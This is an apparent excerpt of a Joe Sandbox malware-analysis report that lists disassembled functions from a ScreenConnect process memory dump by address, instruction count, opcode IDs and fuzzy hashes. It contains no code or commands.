                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                          • API String ID: 0-85052098
                                                                                                                                                                                                                                                          • Opcode ID: 770aba3e8346e79151b00bfd449edcc63dfbfafed6940dae0e5ded9f191f70aa
                                                                                                                                                                                                                                                          • Instruction ID: 9b091eeb163b10152df868511945386ee22b3ac040e3518594ef4cf1927852f4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 770aba3e8346e79151b00bfd449edcc63dfbfafed6940dae0e5ded9f191f70aa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92413A71A1C6594FE758EA288411278B3D2FF95742F144279E4CAC76E6EF28F8028781
                                                                                                                                                                                                                                                          Function 00007FF88826A26D Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 185fb10091dc16ba9201fa207e8fee120f861869762ecceb369d3b7ba28c875b
                                                                                                                                                                                                                                                          • Instruction ID: f1903fcf4a754aaac622341af7168f0ee1a6ce0a55b9c2b644613d2018933a6a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 185fb10091dc16ba9201fa207e8fee120f861869762ecceb369d3b7ba28c875b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6912EE21E1CA8A4FEB98EA2899556F973E2FF54341F4400BAD40EC72D3DF28B846C745
                                                                                                                                                                                                                                                          Function 00007FF8882674F3 Relevance: .4, Instructions: 393COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2c082b24ec5f79668d7fe4b8099c0efd8892ce7c73a68a1565e418cc6a2bc5fa
                                                                                                                                                                                                                                                          • Instruction ID: 0f3469b86786f7e6459a02f8ae958d9f100151aae6c9f32cec2510d4b2b3819e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c082b24ec5f79668d7fe4b8099c0efd8892ce7c73a68a1565e418cc6a2bc5fa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DC144A1E4DACA4FE796EA3868151F47BE1FF55681F1802BAC449C71D7EF18B806C341
                                                                                                                                                                                                                                                          Function 00007FF888264775 Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5d1cec2f23b930b46d0a723999895e3ef21bb7777c61d4a23cbfe926dfa9ff2d
                                                                                                                                                                                                                                                          • Instruction ID: 7df48200cc2a31b91882982836dccd24ba6c19d56e82c7a578f03a5b00525b25
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d1cec2f23b930b46d0a723999895e3ef21bb7777c61d4a23cbfe926dfa9ff2d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80B11432D8CA8B5FEB59EA2898524F537D1FF55791F04017AD48E87183EF18B84AC389
                                                                                                                                                                                                                                                          Function 00007FF888264893 Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ec540d06869222d254db90d3f7c6cd1f7e5d4b328034fb78661e06fb23618c4b
                                                                                                                                                                                                                                                          • Instruction ID: 259f3fdb74d839aad173b411f2525ce9479921ec3395fe4b7a0ea794475da718
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec540d06869222d254db90d3f7c6cd1f7e5d4b328034fb78661e06fb23618c4b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7981B03298CA0B9BEB58EA18C4528F973E1FF54391F50413DD49E83582DF28F95AC789
                                                                                                                                                                                                                                                          Function 00007FF88826B485 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5b589c75d179e18d868838f31851c425c8007d02dc2c2ac74ddad69c2a746e15
                                                                                                                                                                                                                                                          • Instruction ID: 9681cb3a814af0382f49e88d9b356cfce8b18e87ca8ef7c78e9c693f38149558
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b589c75d179e18d868838f31851c425c8007d02dc2c2ac74ddad69c2a746e15
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8819071A08A4E8FDF98EF28C490AE937A1FF59305F1406A9D41EC72D6CB35E842CB41
                                                                                                                                                                                                                                                          Function 00007FF88826CEB5 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2b3e8a0cbb5597de6f5e640845e6cb11a53c9a0a20aaccfa61664e5c53becb8f
                                                                                                                                                                                                                                                          • Instruction ID: 88556eafaba79e65c0ba3a83f45f642787b8504b7c898ad5730142d8f2e8697d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b3e8a0cbb5597de6f5e640845e6cb11a53c9a0a20aaccfa61664e5c53becb8f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D61CF30A0C9894FE758EB288454ABA77E1FF98351F1401BEE04DC72D3CF29A802C785
                                                                                                                                                                                                                                                          Function 00007FF8882689C5 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f20c6ac9fffba03d7ef0e7d9ba692e8e0cedbabc80d43722213b5c9e90d6f41c
                                                                                                                                                                                                                                                          • Instruction ID: 499d4454807ccd73069e773a58cb70033edcdad2c90f9cb76688588b6bc56bb6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f20c6ac9fffba03d7ef0e7d9ba692e8e0cedbabc80d43722213b5c9e90d6f41c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C951B1B1E1CA8E4FEBA5DB6898642B87BE1FF59241F180079D44DC32D2EF28AC45C305
                                                                                                                                                                                                                                                          Function 00007FF8882622C0 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9b6a12fdceaf071a7c3e066692b7eb6f1a6cd1aa00c1ee34b8923ddeab0c2dba
                                                                                                                                                                                                                                                          • Instruction ID: 16f486e359595c6e374b0eadf4389a94ae55820aaa23425b96c13dd3d0166acf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b6a12fdceaf071a7c3e066692b7eb6f1a6cd1aa00c1ee34b8923ddeab0c2dba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51B172A0CA4A8FEB88EE28D451AA533E1FF58750F1400B9D44ECB296DF35F846C784
                                                                                                                                                                                                                                                          Function 00007FF888269919 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e00f3ce3707d1a77db56056c4d17816fe825200baf4167b8f2871fce7aaedaf4
                                                                                                                                                                                                                                                          • Instruction ID: 01a172fbda240329dc1fe49c4b1e1e12bfcf8018e1ed2b26bdd3d905aa555ba3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e00f3ce3707d1a77db56056c4d17816fe825200baf4167b8f2871fce7aaedaf4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B41D271E1DA8A8FEBC9EB2898556A97BE1FF59340F0801A9D05DC72E7DF24AC01C744
                                                                                                                                                                                                                                                          Function 00007FF888269AD1 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6f656139364bafcec4e8f4c857c7af9d83dbb07616e5bdbda6b77fe92efdfb33
                                                                                                                                                                                                                                                          • Instruction ID: 01946415be7f0e1bb9f98fdb08600cd979b897d5558bdb5a89f6471c9d3c1ef0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f656139364bafcec4e8f4c857c7af9d83dbb07616e5bdbda6b77fe92efdfb33
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35419D60A1CA494FE798EA3884697F6B7D1FB99395F0445B9D04DC36D2CF2CBC428741
                                                                                                                                                                                                                                                          Function 00007FF88826B775 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a4bfdf18be94b2c1ae99a33332f0207a5020c61809f3ab52321d574ba120f472
                                                                                                                                                                                                                                                          • Instruction ID: 5a782b09d0f7189cf6034f804ac77972e85f5761fe4536bef2ab81227aa54f6c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4bfdf18be94b2c1ae99a33332f0207a5020c61809f3ab52321d574ba120f472
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D41737161CA898FDB89DF28C8A4AA537E1FF99314F1402ADD45DC72D6CB35E812CB01
                                                                                                                                                                                                                                                          Function 00007FF888264D89 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 126912903054c405d4dbd616e1c6167032b24a6d2800f98c59af969b8bee53d4
                                                                                                                                                                                                                                                          • Instruction ID: 202a77bedfdc22249a5cd33846faec4308645ecc9630bde7bfaec794ee28c949
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 126912903054c405d4dbd616e1c6167032b24a6d2800f98c59af969b8bee53d4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8419971A4CA899FDB89DF28C8A4AA537E1FF58314F5401ADD46EC72D6CB35E852CB00
                                                                                                                                                                                                                                                          Function 00007FF888267AE5 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 56db7fb578361475ac9434f9a72986e786b0c6a9521462fa6947c06447043836
                                                                                                                                                                                                                                                          • Instruction ID: 9af02a65d33cfe559a05d72e072500afa721321c9e1722c4fdf19d5b69ae2cf3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56db7fb578361475ac9434f9a72986e786b0c6a9521462fa6947c06447043836
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1841F0B2E0C94E8FEB69EA68B8510EC77E1FF94746F18027AD41DC3196DF246806C744
                                                                                                                                                                                                                                                          Function 00007FF88826C81E Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 43add0756baa53ae6ab9b75d365066dd56c5f4d74fb4eb04e5370148c3ea0a79
                                                                                                                                                                                                                                                          • Instruction ID: 06199f28a0009a4b6184ba442850704bba0330043e4eefffd38b4ab04b513910
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43add0756baa53ae6ab9b75d365066dd56c5f4d74fb4eb04e5370148c3ea0a79
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03313722E1CA950FE769BA2868461F977D0FBA9660F0401BFE44DC3297DE187C46C3C6
                                                                                                                                                                                                                                                          Function 00007FF88826997C Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 54b39423c51191d2f639ee8d3ee8d10e2c1ee804d2b356dc7d8a52e8ae3f39f2
                                                                                                                                                                                                                                                          • Instruction ID: 344c5ecfe0f1f89f67dc216bce839302a806133f4b235b8bad238476b393e0f4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54b39423c51191d2f639ee8d3ee8d10e2c1ee804d2b356dc7d8a52e8ae3f39f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA31B072E1CD8A8FEAC8DB2C98516A837D2FF99754F1801A8D05DC32D6DF24AC02C744
                                                                                                                                                                                                                                                          Function 00007FF888263775 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d1fd58f08e46380d7f1fdee15fa24b5cfe7f55e55fd140d9fed467254595e89b
                                                                                                                                                                                                                                                          • Instruction ID: 0fab8f0582ed4b8707c8649983a7ea8b4bcefe034259ba82d485637d79dc285a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1fd58f08e46380d7f1fdee15fa24b5cfe7f55e55fd140d9fed467254595e89b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0318D2294E3D55FD702AB68D8A55D53FA0EF47268B0901E3D098CF0A3CA19584AC762
                                                                                                                                                                                                                                                          Function 00007FF888267C1A Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4ba9117ab07305d76f287e2e5b0819d898686df1467ff53e53ccc537d53d733e
                                                                                                                                                                                                                                                          • Instruction ID: ae0186244ee6a21f05fa149687a84687af5de7ec75323b62bb1a379a194a43fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ba9117ab07305d76f287e2e5b0819d898686df1467ff53e53ccc537d53d733e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A21377190DA894FD795EB35A8501E97BE1FF85364F0402BBD48DC3192DB28B806C752
                                                                                                                                                                                                                                                          Function 00007FF888269205 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 03f5752bcd6e61e3abcca027bf074bd7ace63e93f7c472008c7ff2a111c47cf3
                                                                                                                                                                                                                                                          • Instruction ID: a5b428265f1ce13fecc1556262956951faf7efaa0b94e0886e8775d182330ee3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03f5752bcd6e61e3abcca027bf074bd7ace63e93f7c472008c7ff2a111c47cf3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07218D2184E68A4FD756DBA088256E9BBE0FF52251F0901FBC099CB5A3CB5C6C45C762
                                                                                                                                                                                                                                                          Function 00007FF88826BCF9 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5a999a1b070248a6c67a9f56159be8f20743c3a03fab9cb572111f2d57c55c98
                                                                                                                                                                                                                                                          • Instruction ID: e7d759aaadb8c09eaf4cc28d921b9f37592a2c2c2f9bf172bd12197115e448f6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a999a1b070248a6c67a9f56159be8f20743c3a03fab9cb572111f2d57c55c98
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3214B31908B894FD755EE28D8455E53BD1FF593A1F14017BD40DCB252DF35A946C380
                                                                                                                                                                                                                                                          Function 00007FF8882620DA Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fb8a634ad00354b17536a979b7cdca2537757d130c09a240081f036a98445692
                                                                                                                                                                                                                                                          • Instruction ID: d7ddb8a971a5d70ff93f6f7a07133148ead910096b1cdb7c122ede3025c77686
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb8a634ad00354b17536a979b7cdca2537757d130c09a240081f036a98445692
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B31BF75A08A8A9FD389DB28C865AF977E2FF98354F0445B9D45DC7392CB28B801C780
                                                                                                                                                                                                                                                          Function 00007FF88826B155 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8286d1cb054ee81c95d54e3bb15d5b6e4dca3a80ce687a0bfb40caa00592da3c
                                                                                                                                                                                                                                                          • Instruction ID: 05529536e20f98ea9b047340fd3cee13926837f7e1a210bfa243a9a0b5809806
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8286d1cb054ee81c95d54e3bb15d5b6e4dca3a80ce687a0bfb40caa00592da3c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F212161E0CA865FE794EA7C64952F57BE1FF99251F1801BBC008C718BDF18A846C381
                                                                                                                                                                                                                                                          Function 00007FF88826C87D Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3fa19a8b22f3b6a06a4ceb7fb345f4bc78e420ea7a611acd17c1045f79e21a4b
                                                                                                                                                                                                                                                          • Instruction ID: 4ed3581472ab5907e6f273a619b375a91840e266306d524e18a3015f187c6307
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fa19a8b22f3b6a06a4ceb7fb345f4bc78e420ea7a611acd17c1045f79e21a4b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3311DA21E1CA955FD668A9285C5A6F977D1FBA8751F04007FE44DC3293DE287C0683C6
                                                                                                                                                                                                                                                          Function 00007FF888269531 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
